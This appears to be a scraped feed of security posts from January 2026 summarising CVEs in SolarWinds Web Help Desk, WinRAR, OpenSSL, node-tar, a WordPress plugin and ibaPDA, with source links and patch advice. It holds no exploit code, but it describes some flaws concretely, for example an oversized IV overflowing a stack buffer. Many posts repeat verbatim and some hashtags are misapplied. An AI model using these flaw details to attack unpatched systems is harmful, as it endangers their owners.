- https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- https://www.helpnetsecurity.com/2026/01/29/solarwinds-web-help-desk-rce-vulnerabilities/
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40552
- https://nvd.nist.gov/vuln/detail/CVE-2025-40553
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
- https://nvd.nist.gov/vuln/detail/CVE-2025-40551
SolarWinds has just announced four high-severity vulnerabilities in its Web Help Desk (WHD) software that could lead to full system takeover.
These flaws include unauthenticated Remote Code Execution (RCE) via insecure deserialization and multiple Authentication Bypasses, allowing attackers to execute protected methods without any credentials.
CVE-2025-40551 & CVE-2025-40553 (Unauthenticated RCE)
CVE-2025-40552 & CVE-2025-40554 (Auth Bypass)
🔴 CVE-2025-40553 - Critical (9.8)
SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without au...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-40553/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
6 posts
‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554
CVSS: All 9.8
CVEs Published: January 28th, 2026
CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.
CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.
Advisories:
https://nvd.nist.gov/vuln/detail/CVE-2025-40551
https://nvd.nist.gov/vuln/detail/CVE-2025-40552
https://nvd.nist.gov/vuln/detail/CVE-2025-40553
https://nvd.nist.gov/vuln/detail/CVE-2025-40554
📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.
Sources:
- https://www.bleepingcomputer.com/news/security/winrar-path-traversal-flaw-still-exploited-by-numerous-hackers/
- https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-8088
- https://www.helpnetsecurity.com/2026/01/28/winrar-vulnerability-exploited-cve-2025-8088/
---
🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀
CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.
Sources:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15467
https://www.infosecurity-magazine.com/news/12-openssl-flaws/
- https://openssl-library.org/news/vulnerabilities/
- https://twitter.com/IntCyberDigest/status/2016288593547833778
---
🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡
SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.
Sources:
- https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- https://www.helpnetsecurity.com/2026/01/29/solarwinds-web-help-desk-rce-vulnerabilities/
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40552
- https://nvd.nist.gov/vuln/detail/CVE-2025-40553
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
- https://nvd.nist.gov/vuln/detail/CVE-2025-40551
‼️ SolarWinds Web Help Desk RCE Hit by Multiple Critical Security Flaws; CVE-2025-40551, CVE-2025-40552, CVE-2025-40553, CVE-2025-40554
CVSS: All 9.8
CVEs Published: January 28th, 2026
CVE-2025-40551: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40552: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.
CVE-2025-40553: SolarWinds Web Help Desk was found to be susceptible to an untrusted data deserialization vulnerability that could lead to remote code execution, which would allow an attacker to run commands on the host machine. This could be exploited without authentication.
CVE-2025-40554: SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that, if exploited, could allow an attacker to invoke specific actions within Web Help Desk.
Advisories:
https://nvd.nist.gov/vuln/detail/CVE-2025-40551
https://nvd.nist.gov/vuln/detail/CVE-2025-40552
https://nvd.nist.gov/vuln/detail/CVE-2025-40553
https://nvd.nist.gov/vuln/detail/CVE-2025-40554
📦 That WinRAR "Free Trial" You Never Paid For? Hackers Are Exploiting It Right Now 🚨
A WinRAR vulnerability patched last July (CVE-2025-8088) is still being actively exploited by Russian APTs, Chinese threat actors, and cybercrime gangs six months later. The path traversal flaw lets attackers slip malicious files into your system when you extract seemingly innocent archives. If you're still using WinRAR, update immediately or switch to 7-Zip.
Sources:
- https://www.bleepingcomputer.com/news/security/winrar-path-traversal-flaw-still-exploited-by-numerous-hackers/
- https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2025-8088
- https://www.helpnetsecurity.com/2026/01/28/winrar-vulnerability-exploited-cve-2025-8088/
---
🔓 Critical OpenSSL Flaw Could Let Hackers Take Over Your Computer Via Email 💀
CVE-2025-15467 is a critical 9.8 CVSS remote code execution vulnerability in OpenSSL's CMS and S/MIME message processing. OpenSSL powers encrypted communications across the entire internet, and this flaw allows unauthenticated attackers to execute arbitrary code remotely without any credentials. A working proof-of-concept already exists in the wild, meaning both defenders and attackers have access to it.
Sources:
- https://nvd.nist.gov/vuln/detail/CVE-2025-15467
https://www.infosecurity-magazine.com/news/12-openssl-flaws/
- https://openssl-library.org/news/vulnerabilities/
- https://twitter.com/IntCyberDigest/status/2016288593547833778
---
🤦 SolarWinds Ships Critical Vulnerabilities In Their Own Software (Yes, THAT SolarWinds) 🤡
SolarWinds, the company that became the poster child for supply chain attacks after their 2020 breach, just disclosed four critical vulnerabilities in their Web Help Desk product. The flaws include unauthenticated remote code execution and authentication bypass that can be chained together to completely compromise systems without logging in. Five years after congressional hearings and intense security scrutiny, they still shipped this mess.
Sources:
- https://www.bleepingcomputer.com/news/security/solarwinds-warns-of-critical-web-help-desk-rce-auth-bypass-flaws/
- https://www.helpnetsecurity.com/2026/01/29/solarwinds-web-help-desk-rce-vulnerabilities/
- https://www.rapid7.com/blog/post/etr-multiple-critical-solarwinds-web-help-desk-vulnerabilities-cve-2025-40551-40552-40553-40554/
- https://nvd.nist.gov/vuln/detail/CVE-2025-40552
- https://nvd.nist.gov/vuln/detail/CVE-2025-40553
- https://nvd.nist.gov/vuln/detail/CVE-2025-40554
- https://nvd.nist.gov/vuln/detail/CVE-2025-40551
SolarWinds has just announced four high-severity vulnerabilities in its Web Help Desk (WHD) software that could lead to full system takeover.
These flaws include unauthenticated Remote Code Execution (RCE) via insecure deserialization and multiple Authentication Bypasses, allowing attackers to execute protected methods without any credentials.
CVE-2025-40551 & CVE-2025-40553 (Unauthenticated RCE)
CVE-2025-40552 & CVE-2025-40554 (Auth Bypass)
🔴 CVE-2025-40552 - Critical (9.8)
SolarWinds Web Help Desk was found to be susceptible to an authentication bypass vulnerability that if exploited, would allow a malicious actor to execute actions and methods that should be protected by authentication.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-40552/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
2 posts
🟠 CVE-2025-69420 - High (7.5)
Issue summary: A type confusion vulnerability exists in the TimeStamp Response
verification code where an ASN1_TYPE union member is accessed without first
validating the type, causing an invalid or NULL pointer dereference when
processing a malfor...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-69420/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection
CVEs Published: January 27th, 2026
High and Moderate Severity Flaws:
▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions
▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow
Low Severity Flaws:
▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)
"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.
Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
Writeup: https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-24868 - High (7.5)
Mitigation bypass in the Privacy: Anti-Tracking component. This vulnerability affects Firefox < 147.0.2.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24868/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection
CVEs Published: January 27th, 2026
High and Moderate Severity Flaws:
▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions
▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow
Low Severity Flaws:
▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)
"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.
Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
Writeup: https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities
##updated 2026-01-29T16:31:35.700000
1 posts
‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection
CVEs Published: January 27th, 2026
High and Moderate Severity Flaws:
▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions
▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow
Low Severity Flaws:
▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)
"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.
Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
Writeup: https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities
##updated 2026-01-29T16:31:35.700000
1 posts
‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection
CVEs Published: January 27th, 2026
High and Moderate Severity Flaws:
▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions
▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow
Low Severity Flaws:
▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)
"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.
Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
Writeup: https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities
##updated 2026-01-29T16:31:35.700000
1 posts
‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection
CVEs Published: January 27th, 2026
High and Moderate Severity Flaws:
▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions
▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow
Low Severity Flaws:
▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)
"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.
Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
Writeup: https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities
##updated 2026-01-29T16:31:35.700000
1 posts
‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection
CVEs Published: January 27th, 2026
High and Moderate Severity Flaws:
▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions
▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow
Low Severity Flaws:
▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)
"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.
Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
Writeup: https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities
##updated 2026-01-29T16:31:35.700000
1 posts
‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection
CVEs Published: January 27th, 2026
High and Moderate Severity Flaws:
▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions
▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow
Low Severity Flaws:
▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)
"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.
Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
Writeup: https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities
##updated 2026-01-29T16:31:35.700000
1 posts
‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection
CVEs Published: January 27th, 2026
High and Moderate Severity Flaws:
▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions
▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow
Low Severity Flaws:
▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)
"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.
Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
Writeup: https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities
##updated 2026-01-29T16:31:35.700000
1 posts
‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection
CVEs Published: January 27th, 2026
High and Moderate Severity Flaws:
▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions
▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow
Low Severity Flaws:
▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)
"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.
Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
Writeup: https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities
##updated 2026-01-29T16:31:35.700000
1 posts
‼️AISLE Goes 12-for-12 on OpenSSL Vulnerability Detection
CVEs Published: January 27th, 2026
High and Moderate Severity Flaws:
▪️CVE-2025-15467: Stack Buffer Overflow in CMS AuthEnvelopedData Parsing (High): A vulnerability with the potential to enable remote code execution under specific conditions
▪️CVE-2025-11187: PBMAC1 Parameter Validation in PKCS#12 (Moderate): Missing validation that could trigger a stack-based buffer overflow
Low Severity Flaws:
▪️CVE-2025-15468: Crash in QUIC protocol cipher handling
▪️CVE-2025-15469: Silent truncation bug affecting post-quantum signature algorithms (ML-DSA)
▪️CVE-2025-66199: Memory exhaustion via TLS 1.3 certificate compression
▪️CVE-2025-68160: Memory corruption in line-buffering (affects code back to OpenSSL 1.0.2)
▪️CVE-2025-69418: Encryption flaw in OCB mode on hardware-accelerated paths
▪️CVE-2025-69419: Memory corruption in PKCS#12 character encoding
▪️CVE-2025-69420: Crash in TimeStamp Response verification
▪️CVE-2025-69421: Crash in PKCS#12 decryption
▪️CVE-2026-22795: Crash in PKCS#12 parsing
▪️CVE-2026-22796: Crash in PKCS#7 signature verification (affects code back to OpenSSL 1.0.2)
"When parsing CMS AuthEnvelopedData structures that use AEAD ciphers such as AES-GCM, the IV (Initialization Vector) encoded in the ASN.1 parameters is copied into a fixed-size stack buffer without verifying that its length fits the destination. An attacker can supply a crafted CMS message with an oversized IV, causing a stack-based out-of-bounds write before any authentication or tag verification occurs.
Applications and services that parse untrusted CMS or PKCS#7 content using AEAD ciphers (e.g., S/MIME AuthEnvelopedData with AES-GCM) are vulnerable. Because the overflow occurs prior to authentication, no valid key material is required to trigger it. While exploitability to remote code execution depends on platform and toolchain mitigations, the stack-based write primitive represents a severe risk."
Writeup: https://aisle.com/blog/aisle-discovered-12-out-of-12-openssl-vulnerabilities
##updated 2026-01-29T16:31:35.700000
1 posts
Critical File System Vulnerability Patched in iba Systems ibaPDA
iba Systems patched a critical file system vulnerability, CVE-2025-14988 in its ibaPDA software used in critical manufacturing. The flaw allows unauthorized attackers to manipulate files.
**Make sure all industrial devices are isolated from the internet and accessible from trusted networks only. Update ibaPDA to version 8.12.1 as soon as possible. In the meantime apply mitigating measures to limit impact.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-file-system-vulnerability-patched-in-iba-systems-ibapda-k-x-s-9-3/gD2P6Ple2L
updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-24842 - High (8.2)
node-tar,a Tar for Node.js, contains a vulnerability in versions prior to 7.5.7 where the security check for hardlink entries uses different path resolution semantics than the actual hardlink creation logic. This mismatch allows an attacker to cra...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24842/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2026-1280 - High (7.5)
The Frontend File Manager Plugin for WordPress is vulnerable to unauthorized file sharing due to a missing capability check on the 'wpfm_send_file_in_email' AJAX action in all versions up to, and including, 23.5. This makes it possible for unauthe...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1280/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2025-40536 - High (8.1)
SolarWinds Web Help Desk was found to be susceptible to a security control bypass vulnerability that if exploited, could allow an unauthenticated attacker to gain access to certain restricted functionality.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-40536/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
🟠 CVE-2025-40537 - High (7.5)
SolarWinds Web Help Desk was found to be susceptible to a hardcoded credentials vulnerability that, under certain situations, could allow access to administrative functions.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-40537/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-29T16:31:35.700000
1 posts
